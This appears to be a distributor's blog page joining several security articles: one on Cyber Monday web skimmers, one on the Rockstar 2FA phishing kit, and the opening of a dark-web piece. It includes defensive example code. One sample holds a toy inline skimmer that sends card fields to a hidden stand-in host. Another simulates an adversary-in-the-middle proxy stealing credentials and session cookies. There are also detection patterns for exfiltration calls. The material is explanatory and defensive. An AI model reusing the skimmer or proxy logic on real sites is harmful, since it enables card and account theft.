
The Hidden Threat of Malware Skimmers on Cyber Monday

Introduction to Cyber Monday Hazards

With the rise of digital commerce, Cyber Monday has become a focal point for online shopping, attracting consumers with unbeatable deals and offers. Unfortunately, this surge in online activity also draws the attention of cybercriminals seeking to exploit vulnerabilities in e-commerce platforms. Among the myriad threats, malware skimmers stand out as particularly dangerous. These malicious programs stealthily capture sensitive payment information, such as credit card numbers and personal details, during online transactions. As cybercriminals become increasingly sophisticated, the threat landscape evolves, making it imperative for both consumers and businesses to understand the nature of these risks. The stakes are high, and the need for robust cybersecurity measures has never been greater.

Comprehending Malware Skimmers

Malware skimmers (often called web skimmers, or Magecart-style attacks after the groups that popularised them) are designed to surreptitiously capture payment details during online transactions. They are typically injected into an e-commerce site as JavaScript that runs alongside the legitimate checkout page and does nothing visible until a customer fills in the payment form. When the form is submitted, the skimmer copies the card number, expiry date, security code and billing details and transmits them to a server the attackers control, while the genuine order goes through normally. That is what makes the threat so hard to notice: the customer sees a successful purchase on the real site, and the operator sees a working checkout. The skimmer gets in by exploiting vulnerabilities in the site's own code or by compromising third-party components such as plugins, tag managers and scripts loaded from external CDNs, so one compromised supplier can affect every site that loads its code. Understanding how these programs operate is the basis for effective countermeasures, such as restricting which scripts a checkout page may load and which hosts it may contact.
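Operators can turn the mechanism described above into a routine check. The following is an added example written for this page, not Portnox code or any real skimmer sample: it audits the scripts on a checkout page, requiring every external script to come from an allow-listed host and to carry a Subresource Integrity hash, and flagging any inline script that both reads payment fields and sends data off the page. The allowlist, the hostnames, the sample HTML (including its toy inline skimmer and placeholder hash) and the indicator patterns are constructed assumptions for the example.

```python
"""Audit the scripts on a checkout page for web-skimmer indicators.

Added example for this page, not Portnox code. ALLOWED_HOSTS, SAMPLE_HTML
(including its toy inline skimmer) and the indicator patterns are
constructed assumptions; tune them to the real checkout page.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the checkout page is permitted to load scripts from (assumed).
ALLOWED_HOSTS = {"shop.example.com", "cdn.analytics-vendor.example"}

# Constructed page: a first-party script with SRI, an allow-listed vendor tag
# without SRI, an unknown CDN, and an injected inline script that reads the
# card fields on submit and beacons them to a base64-hidden URL.
SAMPLE_HTML = """<html><body>
<form id="checkout"><input name="card_number"><input name="cvv"></form>
<script src="https://shop.example.com/js/checkout.js" integrity="sha384-PLACEHOLDER"></script>
<script src="https://cdn.analytics-vendor.example/tag.js"></script>
<script src="https://static.cdn-content-delivery.xyz/jquery.min.js"></script>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var d = {n: document.querySelector('[name=card_number]').value,
           c: document.querySelector('[name=cvv]').value};
  navigator.sendBeacon(atob('aHR0cHM6Ly9jb2xsZWN0LmV4YW1wbGUv'), JSON.stringify(d));
});
</script>
</body></html>"""

# Indicators: touching payment fields, sending data off the page, hiding strings.
PAYMENT_FIELD = re.compile(r"card[_ -]?number|cardnumber|cvv|cvc|expir|ccnum|\bpan\b", re.I)
EXFIL_CALL = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=", re.I)
OBFUSCATION = re.compile(r"atob\(|fromCharCode|unescape\(|\\x[0-9a-f]{2}", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script>: its src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        # Script bodies arrive here (possibly in several chunks) because the
        # parser treats <script> content as raw character data.
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit(html, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of findings, each with severity, script and reason."""
    collector = ScriptCollector()
    collector.feed(html)
    findings, inline_n = [], 0
    for s in collector.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname or ""
            if host not in allowed_hosts:
                findings.append({"severity": "high", "script": s["src"],
                                 "reason": f"external script host {host!r} is not on the allowlist"})
            elif not s["integrity"]:
                findings.append({"severity": "medium", "script": s["src"],
                                 "reason": "allow-listed script has no integrity (SRI) attribute"})
            continue
        inline_n += 1
        body = s["body"]
        if PAYMENT_FIELD.search(body) and EXFIL_CALL.search(body):
            reason = "inline script reads payment fields and sends data off the page"
            if OBFUSCATION.search(body):
                reason += " using obfuscated strings"
            findings.append({"severity": "high", "script": f"inline script #{inline_n}",
                             "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_HTML):
        print(f["severity"].upper(), f["script"], "-", f["reason"])
```

Run it against a saved copy of the live checkout page on a schedule and diff the findings: a skimmer usually shows up as a new external host or a new inline script. The complementary control is a Content-Security-Policy header on the payment pages (script-src limited to 'self' and the vetted vendors, connect-src limited to your own hosts), which makes the browser refuse the exfiltration even when the injection succeeds.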

Recent Developments in Malware Skimming

Cybercriminals have continued to refine their techniques, making skimmers harder to detect, and notable incidents have hit major retailers, showing that the threat to the e-commerce sector is persistent. The seasonal pattern is visible in adjacent attack types as well: malvertising incidents in the United States rose 42% month-over-month last fall, and a further 41% increase was recorded from July to September this year. Those figures measure malvertising rather than skimming directly, but they show the same upswing in attacks on shoppers around the holiday season. Modern skimmers exploit vulnerabilities in website code and third-party plugins with greater efficiency, which is why continuous monitoring of what actually runs on a checkout page, together with prompt patching, matters more than a one-off review. As cybercriminals adapt, so must defensive strategies.

Safeguarding Your Personal Data

Proactively defending your personal data requires a multi-layered approach. Start with strong, unique passwords for every online account; a password manager makes this practical, since it generates and stores long random passwords so you never reuse one. Turn on two-factor authentication wherever it is offered, so that a stolen password alone is not enough to get in. Keep devices, browsers and software updated to close known vulnerabilities. Use reputable antivirus and anti-malware software to detect malicious code on your devices. Share personal information sparingly and only with sites you trust. A VPN encrypts your traffic on public networks, which is useful on untrusted Wi-Fi. Bear in mind that none of these measures can stop a skimmer running on a legitimate merchant's checkout page; their value lies in limiting what an attacker can do with whatever is captured, and in making sure a leaked password cannot be reused elsewhere.

Secure Online Shopping Habits

Maintaining secure online shopping habits is vital in defending against malware skimmers. Shop only on reputable sites, and check for the padlock symbol in the address bar, which shows that the connection is encrypted with HTTPS. Be aware of what the padlock does not tell you: a legitimate site whose checkout page has been injected with a skimmer still shows one, so it is no guarantee that the page itself is clean. Keep your devices, browsers and security software current, since updates often patch the vulnerabilities that malware relies on. Avoid making purchases on public Wi-Fi; HTTPS protects the payment data in transit, but a hostile network can still redirect you to look-alike sites, and a VPN adds a layer of protection there. Treat unexpected emails and links with suspicion, because phishing lures lead to fake shops built to steal your details. Prefer credit cards over debit cards for online purchases, as credit cards generally carry stronger fraud protection, and use a virtual or single-use card number where your bank offers one, so that a captured number is worth little to the thief. Finally, check your statements during and after the shopping season: when a skimmer sits on a legitimate site, an unexpected charge is often the first sign you will see.

Identifying Indicators of a Compromised Website

Knowing the signs of a compromised or fake website helps you steer clear of the most obvious traps. Be wary of unexpected pop-ups or intrusive advertisements, which may indicate a breach. Unusual URLs, especially those with misspellings, extra characters or look-alike domains, are red flags. Watch the site's layout and behaviour: inconsistencies, broken elements or unusually slow loading can indicate interference. Hover over links to preview their destinations and make sure they point to the legitimate domain. Never ignore browser security warnings, which flag invalid certificates and known malicious sites. The absence of HTTPS, normally shown by a padlock symbol in the address bar, points to inadequate security. Keep in mind, though, that these indicators mostly expose phishing clones and crude attacks. A skimmer injected into a genuine merchant's checkout usually leaves no visible trace for the shopper, so in that case the signs you are most likely to notice are transaction alerts from your bank and unfamiliar charges on your statement.

Reacting to a Cybersecurity Threat

Upon suspecting a cybersecurity breach, swift and decisive action is crucial to mitigate damage. Initially, contact your financial institutions to inform them of potential fraudulent activity. They can assist in freezing accounts, issuing new cards, and monitoring for suspicious transactions. Additionally, change your passwords for any affected accounts, ensuring they are strong and unique to prevent further unauthorized access.

Next, report the incident to relevant authorities, such as the Federal Trade Commission (FTC) or your local cybersecurity agency. Providing detailed information about the breach can aid in broader efforts to combat cybercrime. It is also advisable to alert the affected e-commerce platform so they can investigate and address any vulnerabilities.

In parallel, conduct a thorough scan of your devices using reputable antivirus and anti-malware software to detect and eliminate any lingering threats. Regularly updating your security tools ensures they are equipped to identify the latest malware variants.

Consider placing fraud alerts or credit freezes on your credit reports through major credit bureaus. This adds an extra layer of protection, making it more challenging for cybercriminals to open new accounts in your name.

Educate yourself and stay informed about common cyber threats and preventative measures. Being proactive and knowledgeable can significantly reduce your risk of future incidents. Engage with cybersecurity communities and forums to share experiences and learn from others.

Finally, evaluate and strengthen your overall cybersecurity posture. Implementing multi-factor authentication, using a secure VPN, and maintaining vigilant online practices can fortify your defenses against evolving threats. By taking comprehensive and immediate steps, you can safeguard your personal information and contribute to a more secure digital environment.

Remaining Vigilant in an Increasingly Digital Society

Cyber Monday offers unparalleled opportunities for online shopping but also exposes consumers and businesses to the hidden dangers of malware skimmers. These stealthy threats underscore the importance of vigilance, robust cybersecurity measures, and secure online practices. By recognizing the evolving tactics of cybercriminals and adopting proactive defenses—such as strong passwords, two-factor authentication, secure VPN usage, and careful scrutiny of websites—individuals can protect their sensitive information during transactions.

For businesses, keeping platforms and plugins patched, controlling and monitoring which scripts run on payment pages, and educating customers about safe practices are vital steps in minimizing risk. The growing sophistication of malware skimmers requires a collective effort to enhance cybersecurity awareness and resilience. By staying informed and prepared, we can outpace cybercriminals and ensure that the benefits of digital commerce continue to outweigh the risks.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Rockstar 2FA: Compromising Microsoft 365 Accounts - What MSPs and Small Businesses Need to Know

Key Takeaways 

  1. Sophisticated Phishing-as-a-Service Model: Rockstar 2FA uses advanced adversary-in-the-middle (AiTM) techniques to bypass multi-factor authentication (MFA) protections in Microsoft 365.
  2. Small Businesses Are Prime Targets: Limited resources and cybersecurity awareness make small and medium-sized businesses especially vulnerable to such attacks.
  3. MSPs Must Evolve Defense Strategies: The role of Managed Service Providers (MSPs) in combating advanced threats is more critical than ever, requiring proactive tools, training, and incident response.

 

The Threat Landscape: What Is Rockstar 2FA?

Researchers recently documented a new Phishing-as-a-Service (PhaaS) platform called Rockstar 2FA. The campaign steals Microsoft 365 (M365) credentials and bypasses MFA through adversary-in-the-middle (AiTM) techniques. The platform is a subscription service marketed to cybercriminals on platforms such as Telegram and Mail.ru, offering advanced features such as:

  • Session cookie harvesting to hijack active user sessions
  • Customizable phishing templates mimicking trusted services
  • Antibot features to avoid automated detection systems
  • Randomized source code and links, plus "FUD" (fully undetectable) attachments, to evade detection

Rockstar 2FA capitalizes on user trust in services like Microsoft 365, posing a significant risk for organizations that rely on this platform for communication and collaboration. Its accessibility to attackers, regardless of technical expertise, makes it a widespread and pressing concern.

For more technical details, see the analysis by Trustwave: Rockstar 2FA PhaaS Campaign.

 

How the Attack Works

At the heart of the Rockstar 2FA campaign is its adversary-in-the-middle (AiTM) technique. Here’s how the attack unfolds:

  1. Phishing Email: The attacker sends an email built from one of the platform's templates, such as document and file-sharing notifications, MFA lures or e-signature-themed messages. The campaign uses several delivery mechanisms, including compromised accounts, so that the message appears to come from a credible source, and it carries FUD links and attachments to slip past anti-spam detection.
  2. Antibot: On reaching the landing page, the user first meets a Cloudflare Turnstile challenge. Turnstile is a free service that protects websites from bots; here the threat actors abuse it to keep automated analysis tools and URL scanners away from the phishing page.
  3. The AiTM Server: One server acts as the phishing landing page, the credential store and the proxy. The page imitates the brand's sign-in page behind obfuscated HTML, forwards whatever the victim enters to the legitimate service so that authentication completes normally, and keeps a copy for the attacker together with the session cookie the service issues.
  4. Credential and Cookie Theft: When the victim enters their password and MFA code, the proxy captures both, and because the legitimate service accepts them, it also captures the resulting session cookie.
  5. Session Hijacking: With that cookie, the attacker can use the victim's account directly without being challenged for MFA again, for as long as the session remains valid.

This approach is effective because it defeats the MFA methods most organisations deploy: a one-time code, a push approval or an SMS code is just a value the victim hands over, and the proxy relays it to the real service in time. The exception is phishing-resistant MFA such as FIDO2 security keys and passkeys, whose response is bound to the origin of the site that requested it; a credential registered for the real login domain cannot be completed through a look-alike domain, so the relay fails. Treating MFA as a blanket safeguard, without distinguishing between these types, is what makes AiTM kits so profitable.
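To make that distinction concrete, here is a toy model of the exchange, added for this page; it is not code from the Rockstar 2FA kit or from Trustwave's analysis. It uses a mock identity provider, a mock AiTM proxy and a victim who types into whichever page is in front of them, and shows why a relayed one-time code yields a usable session cookie while a relayed passkey assertion does not. The origins, user names and the HMAC-based stand-ins for the one-time code and the passkey assertion are assumptions (real WebAuthn uses an asymmetric signature over client data that includes the origin; real HOTP uses SHA-1 with dynamic truncation).

```python
"""Toy model of an adversary-in-the-middle (AiTM) phishing proxy.

Added example for this page, not code from the Rockstar 2FA kit or from
Trustwave's analysis. Origins, names and the HMAC-based stand-ins for a
one-time code and a passkey assertion are assumptions. Standard library only.
"""
import hashlib
import hmac
import secrets

LEGIT_ORIGIN = "https://login.example.com"       # assumed real sign-in origin
PHISH_ORIGIN = "https://login-example.com.evil"  # assumed attacker origin


def hotp(secret: bytes, counter: int) -> str:
    """Simplified one-time code; the authenticator app and the IdP both compute it."""
    return hmac.new(secret, counter.to_bytes(8, "big"), hashlib.sha256).hexdigest()[:6]


def sign_assertion(key: bytes, challenge: str, origin: str) -> str:
    """Stand-in for a passkey assertion: the signed data includes the origin
    the client believes it is talking to, as WebAuthn's clientDataJSON does."""
    return hmac.new(key, f"{challenge}|{origin}".encode(), hashlib.sha256).hexdigest()


class IdentityProvider:
    """The legitimate sign-in service (think of the tenant's M365 login)."""

    def __init__(self):
        self.passwords, self.otp_secrets, self.passkeys = {}, {}, {}
        self.challenges, self.sessions = {}, {}

    def register(self, user, password, otp_secret=None, passkey=None):
        self.passwords[user] = password
        if otp_secret is not None:
            self.otp_secrets[user] = otp_secret
        if passkey is not None:
            self.passkeys[user] = passkey

    def new_challenge(self, user):
        self.challenges[user] = secrets.token_hex(16)
        return self.challenges[user]

    def login(self, user, password, otp=None, counter=None, assertion=None):
        """Return a session cookie on success, None otherwise."""
        if self.passwords.get(user) != password:
            return None
        if user in self.otp_secrets:
            # The code is just a string: whoever relays it in time satisfies this check.
            if otp is None or counter is None or \
                    not hmac.compare_digest(otp, hotp(self.otp_secrets[user], counter)):
                return None
        elif user in self.passkeys:
            # The IdP verifies against ITS OWN origin, so an assertion the client
            # computed over the phishing origin can never match.
            expected = sign_assertion(self.passkeys[user], self.challenges.pop(user, ""), LEGIT_ORIGIN)
            if assertion is None or not hmac.compare_digest(assertion, expected):
                return None
        cookie = secrets.token_hex(16)
        self.sessions[cookie] = user
        return cookie


class AiTMProxy:
    """Attacker relay: shows a look-alike page, forwards everything the victim
    types to the real IdP, and keeps a copy, including the session cookie."""

    def __init__(self, idp: IdentityProvider):
        self.idp, self.captured = idp, {}

    def new_challenge(self, user):
        return self.idp.new_challenge(user)  # relayed unchanged

    def login(self, user, password, **mfa):
        self.captured.update(user=user, password=password, **mfa)
        self.captured["cookie"] = self.idp.login(user, password, **mfa)
        return self.captured["cookie"]


def victim_signs_in(service, origin_seen, user, password, otp_secret=None, passkey=None):
    """The victim types into whatever page is in front of them (real IdP or proxy)."""
    if otp_secret is not None:
        counter = 1
        return service.login(user, password, otp=hotp(otp_secret, counter), counter=counter)
    challenge = service.new_challenge(user)
    return service.login(user, password,
                         assertion=sign_assertion(passkey, challenge, origin_seen))


def simulate(mfa: str, via_proxy: bool = True) -> dict:
    """mfa is 'otp' or 'passkey'. Reports whether the victim got a session and
    whether the attacker ended up holding a valid one."""
    idp, secret = IdentityProvider(), secrets.token_bytes(32)
    kwargs = {"otp_secret": secret} if mfa == "otp" else {"passkey": secret}
    idp.register("alice", "correct horse battery", **kwargs)
    proxy = AiTMProxy(idp)
    service, origin = (proxy, PHISH_ORIGIN) if via_proxy else (idp, LEGIT_ORIGIN)
    cookie = victim_signs_in(service, origin, "alice", "correct horse battery", **kwargs)
    stolen = proxy.captured.get("cookie")
    return {
        "victim_logged_in": cookie is not None,
        # Replaying the stolen cookie straight to the IdP needs no further MFA.
        "attacker_has_session": stolen is not None and idp.sessions.get(stolen) == "alice",
    }


if __name__ == "__main__":
    for mfa in ("otp", "passkey"):
        print(mfa, simulate(mfa))
```

Running it shows the OTP victim signed in and the attacker holding a valid cookie, while the passkey attempt through the proxy fails for both parties and succeeds only when the victim talks to the real origin. The cookie, not the MFA code, is what the attacker walks away with, which is why revoking sessions belongs in the response plan alongside the password reset.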

 

The Impact on Small Businesses Using Microsoft 365

Small businesses are a favorite target for phishing campaigns due to limited cybersecurity resources and expertise. For organizations heavily reliant on M365 for day-to-day operations, the risks include:

  • Data Breaches: Unauthorized access to sensitive files, emails, and client information stored in M365.
  • Business Disruption: Compromised accounts can lead to halted operations, delayed projects, or worse, ransomware incidents.
  • Business Email Compromise (BEC): A form of phishing in which cybercriminals impersonate trusted executives, employees or business partners to deceive victims into transferring funds or sharing sensitive information. BEC relies on carefully crafted emails that exploit human trust rather than technical flaws, and a hijacked M365 mailbox gives the attacker a genuine internal address to send them from, which makes the resulting financial and reputational damage that much harder to prevent.
  • Financial Loss: Whether through direct theft, fraudulent transactions, or fines related to non-compliance with data protection regulations.

The Rockstar 2FA campaign also leverages trusted platforms such as Atlassian Confluence, Google Docs, Microsoft OneDrive and OneNote to host malicious links, making phishing emails harder to identify.

 

The Critical Role of MSPs in Defending Against Rockstar 2FA and Similar Threats

Managed Service Providers (MSPs) have become indispensable for small and medium-sized enterprises (SMEs) navigating today’s complex cybersecurity landscape. As Rockstar 2FA highlights, phishing campaigns are becoming more advanced, leveraging tools and tactics that were once the domain of highly skilled hackers. In this context, MSPs play a multifaceted role, acting not just as service providers but as strategic partners in securing their clients’ operations.

 

1. Proactive Threat Prevention

MSPs must focus on preventing threats before they reach their clients’ environments. This requires a blend of technical expertise, advanced tools, and constant vigilance.

  • Deploying Phishing Simulations:
    MSPs can implement solutions like Guardz’s AI-powered phishing simulations to proactively test their clients’ susceptibility to phishing attempts. These simulations mirror real-world scenarios, helping organizations identify gaps in employee training and response.
    • Example: Regular phishing drills can reveal if employees are consistently clicking on malicious links, allowing MSPs to intervene with targeted education.
  • Security Configuration Management:
    Ensuring that Microsoft 365 environments are configured with best-practice security settings (e.g., disabling legacy authentication, enabling Conditional Access policies) reduces the attack surface significantly. The setting that directly counters an AiTM relay is a Conditional Access authentication strength that requires phishing-resistant MFA (FIDO2 security keys, passkeys or certificate-based authentication), because those methods are bound to the legitimate sign-in origin and cannot be completed through a look-alike page; requiring a compliant or hybrid-joined device likewise makes a replayed session far less useful from an attacker's machine.

 

2. Real-Time Detection and Response

Phishing campaigns like Rockstar 2FA are designed to bypass traditional security mechanisms, making real-time detection critical.

  • Anomaly Monitoring:
    MSPs should deploy tools that track login anomalies, such as sign-ins from unexpected locations or devices. Suspicious behavior can trigger alerts and automatic account lockdowns.
  • Continuous Security Operations:
    Many MSPs now operate Security Operations Centers (SOCs) or leverage third-party providers to monitor client environments around the clock. For example, unusual activity within Microsoft 365—like mass file downloads—can indicate a compromised account and prompt immediate action.
  • Incident Response Planning:
    When phishing attacks succeed, MSPs must act quickly to mitigate damage. An effective incident response plan includes:
    • Revoking the compromised session and resetting credentials. In Entra ID, revoking the user's sign-in sessions invalidates refresh tokens and browser session cookies; access tokens already issued stay valid until they expire, so expect a short tail of activity after revocation.
    • Performing forensic analysis to understand how the breach occurred.
    • Communicating transparently with the client about the incident and steps for recovery.
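The anomaly-monitoring and session-revocation steps above assume the replay can be spotted in the logs. The following is an added example, not Guardz or Microsoft code, that runs two rules over sign-in records shaped like an Entra ID sign-in export: a session identifier that is reused from a different IP address or user agent shortly after an MFA-satisfied sign-in (the AiTM fingerprint, since the interactive sign-in comes from the proxy and the cookie is then used from the attacker's machine), and the same user appearing in two countries within an hour. The record layout, the sample rows and the thresholds are constructed for the example.

```python
"""Two detections for AiTM session replay over Entra-style sign-in records.

Added example for this page, not Guardz or Microsoft code. Record layout,
sample rows and thresholds are constructed assumptions; map a real sign-in
export (user, IP, location, user agent, session id, MFA result) onto them.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: (time, user, ip, country, user_agent, session_id, mfa_satisfied)
# alice: MFA sign-in from the proxy's IP, cookie reused minutes later from the
#        attacker's host in another country with a different browser.
# bob, carol: ordinary sessions that stay on one device.
SAMPLE_LOG = [
    ("2024-11-25T09:01:00", "alice@example.com", "203.0.113.7",  "GB", "Edge/Windows", "s1", True),
    ("2024-11-25T09:04:00", "alice@example.com", "198.51.100.9", "NL", "Chrome/Linux", "s1", False),
    ("2024-11-25T08:30:00", "bob@example.com",   "192.0.2.44",   "GB", "Edge/Windows", "s2", True),
    ("2024-11-25T10:15:00", "bob@example.com",   "192.0.2.44",   "GB", "Edge/Windows", "s2", False),
    ("2024-11-25T07:00:00", "carol@example.com", "192.0.2.80",   "US", "Safari/macOS", "s3", True),
    ("2024-11-25T07:40:00", "carol@example.com", "192.0.2.80",   "US", "Safari/macOS", "s3", False),
]

FIELDS = ("time", "user", "ip", "country", "user_agent", "session_id", "mfa")


def parse(rows):
    """Turn the tuples into dicts with a real datetime, sorted by time."""
    recs = [dict(zip(FIELDS, row)) for row in rows]
    for r in recs:
        r["time"] = datetime.fromisoformat(r["time"])
    return sorted(recs, key=lambda r: r["time"])


def detect_session_replay(records, window=timedelta(hours=8)):
    """A session id seen from a second IP or user agent within the window.
    A cookie earned with MFA normally stays on the device that earned it; in
    an AiTM attack the sign-in comes from the proxy and the reuse from the
    attacker's machine."""
    by_session = defaultdict(list)
    for r in records:
        by_session[r["session_id"]].append(r)
    alerts = []
    for sid, recs in by_session.items():
        first = recs[0]
        for later in recs[1:]:
            moved = later["ip"] != first["ip"] or later["user_agent"] != first["user_agent"]
            if moved and later["time"] - first["time"] <= window:
                alerts.append({
                    "rule": "session_replay", "user": later["user"], "session_id": sid,
                    "issued_to": (first["ip"], first["user_agent"], first["mfa"]),
                    "reused_from": (later["ip"], later["user_agent"]),
                    "minutes_after": int((later["time"] - first["time"]).total_seconds() // 60),
                })
                break  # one alert per session is enough
    return alerts


def detect_impossible_travel(records, window=timedelta(hours=1)):
    """The same user signing in from two countries within the window."""
    by_user = defaultdict(list)
    for r in records:
        by_user[r["user"]].append(r)
    alerts = []
    for user, recs in by_user.items():
        for prev, cur in zip(recs, recs[1:]):
            if cur["country"] != prev["country"] and cur["time"] - prev["time"] <= window:
                alerts.append({
                    "rule": "impossible_travel", "user": user,
                    "from": (prev["country"], prev["ip"]), "to": (cur["country"], cur["ip"]),
                    "minutes_apart": int((cur["time"] - prev["time"]).total_seconds() // 60),
                })
    return alerts


def run_detections(rows=SAMPLE_LOG):
    """Run both rules and return every alert; the caller decides the response
    (revoke sessions, reset credentials, pull the audit log for the user)."""
    records = parse(rows)
    return detect_session_replay(records) + detect_impossible_travel(records)


if __name__ == "__main__":
    for alert in run_detections():
        print(alert)
```

Feed it a real export by mapping the user, IP, location, user agent and session identifier columns onto the tuple layout. IP changes alone (mobile networks, VPN exits) will produce noise, so weight user-agent and country changes higher, and make the first response to a hit the revocation of the user's sign-in sessions rather than only a password reset, since the attacker is holding a cookie rather than a password.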

 

3. Employee Education and Cyber Hygiene

Phishing remains one of the most successful attack vectors because it targets human behavior. MSPs can turn this vulnerability into a strength by fostering a culture of cybersecurity awareness.

  • Tailored Cybersecurity Training:
    MSPs should regularly provide training sessions for employees, focusing on real-world examples of phishing attempts. These sessions should cover:
    • Identifying phishing red flags, such as mismatched URLs, urgent language, and unusual requests.
    • Steps to verify sender legitimacy, such as calling the organization directly.
    • The importance of not sharing credentials or MFA codes under any circumstances.
  • Phishing Resilience Programs:
    A resilience program combines simulated phishing attacks, immediate feedback, and ongoing education. The goal is to transform employees from potential vulnerabilities into a critical line of defense.

 

4. Security Integration Across Platforms

Small businesses often rely on multiple cloud-based platforms beyond Microsoft 365, such as Google Workspace, Dropbox, and CRM systems. MSPs must ensure that security measures extend seamlessly across these platforms.

  • Unified Threat Management:
    By integrating security tools across platforms, MSPs can create a centralized system for threat detection and response. This approach prevents attackers from exploiting gaps in security coverage.
  • Identity and Access Management (IAM):
    Implementing IAM solutions ensures that access to sensitive data is restricted to authorized personnel. MSPs should use tools that enforce principles like least privilege and role-based access controls.

 

5. Guiding Clients Through a Changing Threat Landscape

Cyber threats evolve rapidly, and businesses often struggle to keep up. MSPs act as trusted advisors, helping their clients navigate these changes.

  • Regular Security Reviews:
    Periodic reviews allow MSPs to assess their clients’ current security posture and recommend updates to address new threats, such as those posed by Rockstar 2FA.
  • Advising on Cybersecurity Investments:
    MSPs can guide businesses on the most effective use of limited budgets, prioritizing solutions that deliver the highest return on investment. For instance:
    • Encouraging investment in tools like phishing simulations to prevent human errors.
    • Recommending endpoint detection and response (EDR) solutions to protect against ransomware.
  • Cyber Insurance Advisory:
    With threats like Rockstar 2FA on the rise, MSPs can assist clients in obtaining cyber insurance policies that cover phishing-related damages, complementing their technical defenses.

 

6. Building Trust Through Transparency

For many small businesses, trust is a key factor in selecting an MSP. Clients need to feel confident that their MSP is not only capable of defending against threats but also committed to their success.

  • Regular Reporting:
    Providing clients with detailed reports on security incidents, training outcomes, and system health builds confidence and highlights the value of the MSP’s services.
  • Collaborative Incident Management:
    When a breach occurs, clear and honest communication ensures clients understand the steps being taken to resolve the issue and prevent future occurrences.

 

Guardz’s Comprehensive Approach to Phishing Prevention

Guardz offers a robust suite of tools designed to combat phishing threats and enhance organizational resilience, making it an invaluable ally for MSPs and small businesses. By combining email security protection and AI-powered phishing simulations, Guardz provides both proactive and reactive defenses against campaigns like Rockstar 2FA.

 

1. Email Security Protection

Guardz’s email security solution is a critical first line of defense against phishing attacks. It actively scans and monitors incoming emails, detecting and blocking suspicious messages before they reach employees’ inboxes.

Key capabilities include:

  • Phishing Detection: Identifies malicious links, attachments, and spoofed sender addresses commonly used in phishing campaigns.
  • Real-Time Threat Analysis: Uses advanced algorithms to analyze email metadata and content for indicators of compromise (IoCs).
  • Automated Remediation: Flags and quarantines phishing emails, preventing users from interacting with potentially harmful content.

This layer of protection significantly reduces the likelihood of a phishing attack reaching employees, especially in environments with high email traffic like Microsoft 365.

 

2. Phishing Simulation Tool

Even with robust email protection, phishing attempts may occasionally bypass filters, relying on human error to succeed. Guardz addresses this vulnerability with its AI-powered phishing simulation tool, designed to enhance employee awareness and resilience.

How it Works:

  • Realistic Simulations: Guardz leverages AI to craft realistic phishing campaigns that mimic current threats, including tactics like AiTM attacks.
  • Customizable Scenarios: MSPs can tailor simulations to align with the specific challenges faced by their clients, making the training highly relevant.
  • Immediate Feedback: Employees receive instant feedback on their actions during simulations, turning mistakes into valuable learning opportunities.
  • Actionable Reporting: Detailed reports help organizations identify patterns in employee behavior and target areas for improvement.

By regularly running simulations, businesses can build a culture of vigilance, ensuring employees are prepared to recognize and report phishing attempts in real-world scenarios.

 

Lessons Learned: Protecting Against Sophisticated Phishing Attacks

For MSPs:

  1. Stay Ahead of Threats: Regularly update clients about evolving phishing tactics like AiTM attacks to ensure they understand the risks.
  2. Adopt Layered Security: Combine phishing-resistant MFA where the tenant supports it, phishing simulations, endpoint protection, and continuous monitoring for a robust defense.
  3. Empower Through Education: Provide ongoing training and resources to help employees identify and report phishing attempts effectively.

For Small Businesses:

  1. Trust but Verify: Always verify suspicious emails, especially those requesting credentials or sensitive information.
  2. Invest in Training: Regular phishing simulations can help employees stay alert and minimize errors.
  3. Rely on Experts: Partnering with a knowledgeable MSP ensures access to advanced tools and expertise that may not be available in-house.

 

The Rockstar 2FA campaign highlights the growing sophistication of phishing attacks and the urgent need for advanced defenses. For MSPs and small businesses, proactive strategies, continuous education, and robust tools like Guardz’s phishing simulations are critical in staying secure.

About Guardz
Guardz is on a mission to create a safer digital world by empowering Managed Service Providers (MSPs). Their goal is to proactively secure and insure Small and Medium Enterprises (SMEs) against ever-evolving threats while simultaneously creating new revenue streams, all on one unified platform.


The darkest season: the peak time of cyber threats

Summary: Dark web forums peak in activity during winter months. Holiday scams surge, boredom rises, and AI makes cyber-attacks easier.

The dark web is a key enabler for cybercrime. It allows bad actors to share tools, knowledge, and services secretly. 

Anyone wanting to buy illegal items—like cyber-attack tools or drugs—can find them on dark web marketplaces. These markets appear and disappear quickly as they get blocked. They are usually advertised on dark web forums, and some even have mirror sites on the clear web.

Researching the dark web is hard because marketplaces have short lifespans. They come and go quickly. That’s why NordLayer and NordStellar decided to analyze dark web forums instead.

Forums are more stable over time. This stability makes it possible to see trends in discussions. These forums mix legal topics like news, politics, and content sharing with illegal activities.

However, legal activities like whistleblowing make up less than 1% of the content. Illegal activities are the largest part. By studying these forums, we wanted to uncover new trends in illicit activities.

